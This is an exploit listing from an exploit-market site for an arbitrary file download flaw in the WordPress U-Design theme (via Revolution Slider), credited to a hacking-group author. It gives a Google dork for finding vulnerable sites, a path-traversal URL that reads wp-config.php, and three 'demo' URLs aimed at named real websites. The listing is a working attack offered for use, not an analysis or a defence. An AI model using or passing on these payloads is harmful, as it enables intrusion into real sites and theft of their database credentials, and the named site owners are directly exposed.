[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Theme U-Design Arbitrary File Download Vulnerability

Author
terrorist
Risk
[
Security Risk High
]
0day-ID
0day-ID-23143
Category
web applications
Date add
18-01-2015
Platform
php
######################
# Exploit Title: Wordpress Theme U-Design Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist - GHC (Georgian Hacking Community) team
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/u-design/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

#Demo

http://inuitartfoundation.org/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://neadkolor.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.kingstonphoenixgroup.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2024-12-25]  #